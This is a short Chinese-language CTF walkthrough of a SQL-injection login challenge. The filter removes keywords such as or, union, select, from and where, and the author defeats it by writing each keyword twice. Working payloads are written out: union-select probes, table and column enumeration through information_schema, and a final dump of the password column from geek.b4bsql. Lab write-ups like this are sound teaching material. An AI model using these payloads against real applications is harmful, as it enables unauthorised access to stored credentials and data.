打开界面是一个登录框,所以直接使用的万能公式,但是没用出发了报错
结合提示来看,题目应该是过滤掉了or
尝试大小写绕过,失败了
尝试双写绕过,成功绕过限制
接下来就判断字段数,发现by也被过滤掉了
登是登上去了,但是没啥用测不出来,还是直接用联合查询看看
不出意外union select都被过滤掉了,还是尝试双写绕过
1' ununionion seselectlect 1,2#
虽然没能成功,但是根据报错提示得出字段数不对
1' ununionion seselectlect 1,2,3#
成功试出来,包含三个字段
information from还有 where给过滤了,再次尝试双写绕过
发现information只是过滤掉了or
绕过成功
-1' ununionion seselectlect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
查看b4bsql表里的所有字段,并没有发现任何flag表,查看geekuser也是一样,那现在就一个个看吧,通常可能会在password里
-1' ununionion seselectlect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
发现password被过滤,基本没跑了,尝试双写绕过
真的蠢,原来是因为password里包含or 所以被过滤掉了
获取到flag,完成
-1' ununionion seselectlect 1,database(),group_concat(passwoorrd) frfromom geek.b4bsql#